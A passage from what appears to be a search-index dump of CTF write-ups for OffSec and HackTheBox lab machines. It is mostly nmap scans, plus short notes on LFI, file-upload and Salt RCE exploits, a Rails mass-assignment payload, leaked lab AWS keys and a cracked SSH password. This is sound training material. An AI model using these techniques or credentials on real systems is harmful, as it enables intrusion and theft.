37:21:14:3e:23:e5:13:40:20:05:f9:79:e0:82:0b:09 (RSA) | 256 b9:8d:bd:90:55:7c:84:cc:a0:7f:a8:b4:d3:55:06:a7 (ECDSA) |_ 256 07:07:29:7a:4c:7c:f2:b0:1f:3c:3f:2b:a1:56:9e:0a (ED25519) 6379/tcp open redis Redis key-value store 4.0.14 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1720/tcp) HOP RTT ADDRESS 1 90.11 ms 192.168.45.1 2 90.08 ms 192.168.45.254 3 90.15 ms 192.168.251.1 4 90.20 ms 192.168.133.176 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds Dirbusting # Port 80 # Exploitation # using this we have our shell\nwe can run the redis-status binary apparently, let's check that out\n$ sudo -l Matching Defaults entries for prudence on blackgate: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User prudence may run the following commands on blackgate: (root) NOPASSWD: /usr/local/bin/redis-status $ strings /usr/local/bin/redis-status /lib64/ld-linux-x86-64.so.2 gets puts printf stderr system fwrite strcmp __libc_start_main libc.so.6 GLIBC_2.2.5 __gmon_start__ H=X@@ []A\\A]A^A_ we are able to escalate our privs with a kernel exploit\n","date":"14 March 2026","externalUrl":null,"permalink":"/ctf-writeups/blackgate/","section":"CTF Writeups","summary":"","title":"BlackGate","type":"ctf-writeups"},{"content":" Boolean # Overview # OS: Linux IP: 192.168.100.230 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # bypassed account confirmation + LFI, access with ssh and priv esc with ssh.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions 
Enumeration # Nmap # $ nmap 192.168.133.231 -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-14 15:39 EDT Nmap scan report for 192.168.133.231 Host is up (0.088s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA) | 256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA) |_ 256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519) 80/tcp open http | http-title: Boolean |_Requested resource was http://192.168.133.231/login | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: | HTTP/1.1 400 Bad Request | FourOhFourRequest, GetRequest, HTTPOptions: | HTTP/1.0 403 Forbidden | Content-Type: text/html; charset=UTF-8 |_ Content-Length: 0 3000/tcp closed ppp 33017/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Development |_http-server-header: Apache/2.4.38 (Debian) 1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.95%I=7%D=3/14%Time=69B5B98A%P=x86_64-pc-linux-gnu%r(GetR SF:equest,55,\u0026#34;HTTP/1\\.0\\x20403\\x20Forbidden\\r\\nContent-Type:\\x20text/html; SF:\\x20charset=UTF-8\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions,55,\u0026#34;H SF:TTP/1\\.0\\x20403\\x20Forbidden\\r\\nContent-Type:\\x20text/html;\\x20charset= SF:UTF-8\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,1C,\u0026#34;HTTP/1\\.1\\x20 SF:400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(X11Probe,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\ SF:x20Request\\r\\n\\r\\n\u0026#34;)%r(FourOhFourRequest,55,\u0026#34;HTTP/1\\.0\\x20403\\x20Forbid SF:den\\r\\nContent-Type:\\x20text/html;\\x20charset=UTF-8\\r\\nContent-Length:\\ SF:x200\\r\\n\\r\\n\u0026#34;)%r(GenericLines,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\ SF:n\\r\\n\u0026#34;)%r(RPCCheck,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(D SF:NSVersionBindReqTCP,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r( SF:DNSStatusRequestTCP,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r( SF:Help,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(SSLSessionReq,1 SF:C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(TerminalServerCookie, SF:1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(TLSSessionReq,1C,\u0026#34;HT SF:TP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(Kerberos,1C,\u0026#34;HTTP/1\\.1\\x20 SF:400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(SMBProgNeg,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Ba SF:d\\x20Request\\r\\n\\r\\n\u0026#34;)%r(LPDString,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Reque SF:st\\r\\n\\r\\n\u0026#34;)%r(LDAPSearchReq,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n 
SF:\\r\\n\u0026#34;)%r(LDAPBindReq,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r SF:(SIPOptions,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(LANDesk- SF:RC,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(TerminalServer,1C SF:,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(NCP,1C,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(NotesRPC,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x SF:20Request\\r\\n\\r\\n\u0026#34;)%r(JavaRMI,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\ SF:n\\r\\n\u0026#34;)%r(WMSRequest,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r SF:(oracle-tns,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(ms-sql-s SF:,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(afp,1C,\u0026#34;HTTP/1\\.1\\x SF:20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(giop,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x2 SF:0Request\\r\\n\\r\\n\u0026#34;); Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.0 (92%), OpenWrt 22.03 (Linux 5.10) (92%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (90%), Linux 4.15 (90%), Linux 2.6.32 - 3.10 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 3000/tcp) HOP RTT ADDRESS 1 81.55 ms 192.168.45.1 2 81.53 ms 192.168.45.254 3 81.81 ms 192.168.251.1 4 82.07 ms 192.168.133.231 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds ┌──(kali㉿kali)-[~/Desktop/Boxes/Offsec] └─$ nmap 192.168.133.231 -sU --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-14 15:40 EDT Nmap scan report for 192.168.133.231 Host is up (0.085s latency). All 1000 scanned ports on 192.168.133.231 are in ignored states. Not shown: 1000 open|filtered udp ports (no-response) Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds ┌──(kali㉿kali)-[~/Desktop/Boxes/Offsec] Dirbusting # Port 80 # let's change this to true\nNow moving on\nwe have been brought to this filemanager page\nand we have lfi over here\nlet's generate our ssh key\nnow let's ssh remi@192.168.133.231 -i Boolean\nPort 33017 —\u0026gt; Development # Exploitation # ","date":"14 March 2026","externalUrl":null,"permalink":"/ctf-writeups/boolean/","section":"CTF Writeups","summary":"","title":"Boolean","type":"ctf-writeups"},{"content":" Exfiltrated # Overview # OS: Linux IP: 192.168.165.98 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # cron that was running exiftool vulnerable to rce.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA) | 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA) |_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519) **80/tcp open http Apache httpd 2.4.41 ((Ubuntu))** |_http-title: Did not follow redirect to http://exfiltrated.offsec/ |_http-server-header: Apache/2.4.41 (Ubuntu) **| http-robots.txt: 7 disallowed entries | /backup/ /cron/? 
/front/ /install/ /panel/ /tmp/ |_/updates/** Let's add exfiltrated.offsec to our hosts file\nDirbusting # Port 80 # Subrion CMS v4.2.1\nSearching that gets us this\nFile Upload —\u0026gt; RCE, but it is Authenticated so let's keep it in mind for now\nSubrion CMS 4.2.1 - Arbitrary File Upload\n/robots.txt # Disallow: /install/ Disallow: /panel/ Disallow: /tmp/ Disallow: /updates/ Exploitation # we were able to log in to the administrator panel with default creds\nlet's go ahead with the authenticated file upload\nNow that we are in let's try to privesc\napparently there is a cron job running image-exif.sh and a file in the root directory called swap.img\non searching for an exiftool exploit we get\nhttps://github.com/UNICORDev/exploit-CVE-2021-22204\nnow let's wait a min\nand we are root\n","date":"13 March 2026","externalUrl":null,"permalink":"/ctf-writeups/exfiltrated/","section":"CTF Writeups","summary":"","title":"Exfiltrated","type":"ctf-writeups"},{"content":" Pelican # Overview # OS: Linux IP: 192.168.165.98 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access via UI and then priv esc with sudo -l process dump.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65526 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION **22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)** | ssh-hostkey: | 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61 | 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA) | ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc= | 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0 139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) **445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)** 631/tcp open ipp syn-ack ttl 61 CUPS 2.2 **|_http-server-header: CUPS/2.2 IPP/2.1** | http-methods: | Supported Methods: GET HEAD OPTIONS POST PUT |_ Potentially risky methods: PUT |_http-title: Forbidden - CUPS v2.2.10 **2181/tcp open zookeeper syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014) 2222/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)** | ssh-hostkey: | 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61 | 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc= | 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0 **8080/tcp open http syn-ack ttl 61 Jetty 1.0** |_http-title: Error 404 Not Found 8081/tcp open http syn-ack ttl 61 nginx 1.14.2 | http-methods: |_ Supported Methods: GET HEAD **POST** OPTIONS |_http-server-header: nginx/1.14.2 |_http-title: Did not follow redirect to 
http://192.168.165.98:8080/exhibitor/v1/ui/index.html **39605/tcp open java-rmi syn-ack ttl 61 Java RMI** Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: Uptime guess: 40.990 days (since Sat Jan 31 13:52:40 2026) Network Distance: 4 hops TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 28515/tcp): CLEAN (Couldn\u0026#39;t connect) | Check 2 (port 24701/tcp): CLEAN (Couldn\u0026#39;t connect) | Check 3 (port 45580/udp): CLEAN (Timeout) | Check 4 (port 27484/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s | smb2-time: | date: 2026-03-13T18:37:46 |_ start_date: N/A | smb-security-mode: **| account_used: guest** | authentication_level: user | challenge_response: supported **|_ message_signing: disabled (dangerous, but default)** | smb-os-discovery: **| OS: Windows 6.1 (Samba 4.9.5-Debian)** | Computer name: **pelican** | NetBIOS computer name: PELICAN\\x00 | Domain name: \\x00 | FQDN: pelican |_ System time: 2026-03-13T14:37:45-04:00 Dirbusting # Port 8081 # Web behavior was the main signal here, so I traced each response change before exploitation.\nZookeeper v1.0\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nvisiting this\nhttps://www.exploit-db.com/exploits/48654\ndoing this gives us a shell as charles\nPrivEsc # We are able to run this binary\ngcore, lets check it out on gtfo bins\nlet me just note lightdm pid as 
672, 661 662 679 680 685 688 692\n514 and 636 are cups\nstrings on those gave me nothing, let\u0026rsquo;s try ps aux | grep root and see if there is anything interesting\nInteresting, let\u0026rsquo;s check it out\nI think we got it with su using these creds\n","date":"13 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pelican/","section":"CTF Writeups","summary":"","title":"Pelican","type":"ctf-writeups"},{"content":" Twiggy # Overview # OS: Linux IP: 192.168.165.62 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # Found an exposed API endpoint backed by an outdated Salt version with a known RCE vulnerability.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-13 06:47 EDT Nmap scan report for 192.168.165.62 Host is up (0.084s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION **22/tcp open ssh OpenSSH 7.4 (protocol 2.0)** | ssh-hostkey: | 2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA) | 256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA) |_ 256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519) 53/tcp open domain NLnet Labs NSD **80/tcp open http nginx 1.16.1** |_http-title: Home | **Mezzanine** |_http-server-header: nginx/1.16.1 **8000/tcp open http nginx 1.16.1** |_http-title: Site doesn\u0026#39;t have a title (application/json). |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: nginx/1.16.1 4505/tcp open zmtp ZeroMQ ZMTP 2.0 4506/tcp open zmtp ZeroMQ ZMTP 2.0 8000/tcp open http nginx 1.16.1 |_http-title: Site doesn\u0026#39;t have a title (application/json). 
|_http-server-header: nginx/1.16.1 |_http-open-proxy: Proxy might be redirecting requests Warning: OSScan results may be unreliable because w Dirbusting # nothing Port 4505 \u0026amp; 4506 # ZeroMQ ZMTP 2.0\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # On looking this up\nwe come across this exploit I found online for this version\nLet\u0026rsquo;s start a venv\npython -m venv venv source venv/bin/activate https://github.com/jasperla/CVE-2020-11651-poc/blob/master/README.md and boom, we got our reverse shell; I had to change the port we were using so the firewall would not catch on\n","date":"13 March 2026","externalUrl":null,"permalink":"/ctf-writeups/twiggy/","section":"CTF Writeups","summary":"","title":"Twiggy","type":"ctf-writeups"},{"content":" Facts # Overview # OS: Linux Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # season.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap -sCV -A --min-rate=20000 facts.htb Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-10 06:52 EDT Nmap scan report for facts.htb (10.129.4.247) Host is up (0.10s latency). 
Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA) |_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519) **80/tcp open http nginx 1.26.3 (Ubuntu)** |_http-server-header: nginx/1.26.3 (Ubuntu) |_http-title: facts Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 23/tcp) HOP RTT ADDRESS 1 114.91 ms 10.10.14.1 2 115.04 ms facts.htb (10.129.4.247) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds nmap -sCV -A -p- -min-rate=20000 facts.htb Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-10 07:21 EDT Warning: 10.129.4.247 giving up on port because retransmission cap hit (10). Nmap scan report for facts.htb (10.129.4.247) Host is up (0.12s latency). 
Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA) |_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519) 80/tcp open http nginx 1.26.3 (Ubuntu) |_http-server-header: nginx/1.26.3 (Ubuntu) |_http-title: facts 54321/tcp open http Golang net/http server |_http-title: Did not follow redirect to http://facts.htb:9001 |_http-server-header: MinIO | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 400 Bad Request | Accept-Ranges: bytes | Content-Length: 303 | Content-Type: application/xml | Server: MinIO | Strict-Transport-Security: max-age=31536000; includeSubDomains | Vary: Origin | X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8 | X-Amz-Request-Id: 189B770345D0671F | X-Content-Type-Options: nosniff | X-Xss-Protection: 1; mode=block | Date: Tue, 10 Mar 2026 11:22:14 GMT | \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; | \u0026lt;Error\u0026gt;\u0026lt;Code\u0026gt;InvalidRequest\u0026lt;/Code\u0026gt;\u0026lt;Message\u0026gt;Invalid Request (invalid argument)\u0026lt;/Message\u0026gt;\u0026lt;Resource\u0026gt;/nice ports,/Trinity.txt.bak\u0026lt;/Resource\u0026gt;\u0026lt;RequestId\u0026gt;189B770345D0671F\u0026lt;/RequestId\u0026gt;\u0026lt;HostId\u0026gt;dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8\u0026lt;/HostId\u0026gt;\u0026lt;/Error\u0026gt; | GenericLines, Help, RTSPRequest, SSLSessionReq: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 400 Bad Request | Accept-Ranges: bytes | Content-Length: 276 | Content-Type: application/xml | Server: MinIO | Strict-Transport-Security: max-age=31536000; includeSubDomains | Vary: Origin | X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8 | 
X-Amz-Request-Id: 189B76FF6775CEB9 | X-Content-Type-Options: nosniff | X-Xss-Protection: 1; mode=block | Date: Tue, 10 Mar 2026 11:21:57 GMT | \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; | \u0026lt;Error\u0026gt;\u0026lt;Code\u0026gt;InvalidRequest\u0026lt;/Code\u0026gt;\u0026lt;Message\u0026gt;Invalid Request (invalid argument)\u0026lt;/Message\u0026gt;\u0026lt;Resource\u0026gt;/\u0026lt;/Resource\u0026gt;\u0026lt;RequestId\u0026gt;189B76FF6775CEB9\u0026lt;/RequestId\u0026gt;\u0026lt;HostId\u0026gt;dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8\u0026lt;/HostId\u0026gt;\u0026lt;/Error\u0026gt; | HTTPOptions: | HTTP/1.0 200 OK | Vary: Origin | Date: Tue, 10 Mar 2026 11:21:57 GMT |_ Content-Length: 0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 114.28 ms 10.10.14.1 2 114.52 ms facts.htb (10.129.4.247) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 41.57 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Let\u0026rsquo;s look at Camaleon CMS\nIf the key exists in the database (the users table has role:string), an attacker can send password[role]=admin and Rails sets @user.role = “admin”\nNow we have admin\nAKIAA042540D4E8C3E8E\nZf5bIMiltmLF2ux1JZyX3Gs3MasRtlwcAolHc7em\nLet\u0026rsquo;s use these creds with the AWS CLI and enumerate all the S3 buckets\n┌──(kali㉿kali)-[~/Desktop/vpn] └─$ aws --endpoint-url http://facts.htb:54321 s3 ls s3://internal/ PRE .bundle/ PRE .cache/ PRE .ssh/ 2026-01-08 13:45:13 220 .bash_logout 2026-01-08 13:45:13 3900 .bashrc 2026-01-08 13:47:17 20 .lesshst 2026-01-08 13:47:17 807 .profile ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ aws --endpoint-url http://facts.htb:54321 s3 ls s3://randomfacts/ PRE thumb/ 2025-09-11 08:07:06 446847 animalejected.png 2025-09-11 08:07:06 271210 annefrankasteroid.png 2025-09-11 08:07:06 255778 catsattachment.png 2025-09-11 08:07:05 411597 cuteanimals.png 2025-09-11 08:07:05 177331 darkchocolate.png 2025-09-11 08:07:05 312753 dogscatssmell.png 2025-09-11 08:07:04 922561 dolphinfact.png 2025-09-11 08:07:04 67352 finlandhappiest.png 2025-09-11 08:07:04 388178 firstimpressions.png 2025-09-11 08:07:04 100689 firsttransaction.png 2025-09-11 08:07:03 222436 firstwebcam.png 2025-09-11 08:07:03 128158 georgewashingtonslaves.png 2025-09-11 08:07:03 34816 logopage.png 2025-09-11 08:07:03 16886 logopage2.png 2025-09-11 08:07:02 80796 pressureupbeat.png 2025-09-11 08:07:02 24792 primary-question-mark.png 2025-09-11 08:07:02 341284 smallanimals.png 2025-09-11 08:07:02 332397 superiorpeople.png 2025-09-11 08:07:01 39579 vanilla.png 2025-09-11 08:07:01 35769 youtubewatchhours.png and using an exploit we found online we read the /etc/passwd file and found a user called trivia, who apparently owns this SSH key\nLogging in after cracking the key with john, which gives the password as 
dragonballz\nWe get the user flag\nsudo -l shows we can execute a binary called facts as sudo, and we exploit that through gtfobins\n","date":"10 March 2026","externalUrl":null,"permalink":"/ctf-writeups/facts/","section":"CTF Writeups","summary":"","title":"Facts","type":"ctf-writeups"},{"content":"","date":"10 March 2026","externalUrl":null,"permalink":"/tags/hackthebox/","section":"Tags","summary":"","title":"Hackthebox","type":"tags"},{"content":"","date":"10 March 2026","externalUrl":null,"permalink":"/tags/htb/","section":"Tags","summary":"","title":"Htb","type":"tags"},{"content":" WingData # Overview # OS: Linux IP: 10.129.244.106 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # season.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Host is up (0.11s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0) | ssh-hostkey: | 256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA) |_ 256 